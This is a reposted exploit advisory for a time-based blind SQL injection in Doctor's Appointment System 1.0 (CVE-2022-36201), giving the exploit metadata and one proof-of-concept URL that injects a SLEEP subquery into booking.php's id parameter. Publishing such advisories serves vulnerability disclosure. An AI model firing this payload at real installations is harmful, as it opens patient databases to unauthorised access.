Exploit/Advisories no image

Published on September 1st, 2022 📆 | 3917 Views ⚑

0

Doctor’s Appointment System 1.0 SQL Injection – Torchsec


https://www.ispeech.org

# Exploit Title: SQLi - Doctor's Appointment System v1.0
# Google Dork: N/A
# Date: 7/13/2022
# Exploit Author: Abdullah Zaid - @_aznull
# Vendor Homepage:
https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip
# Version: 1.0
# Tested on: Linux
# CVE : CVE-2022-36201

POC:

http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)





Source link

Tagged with:



Comments are closed.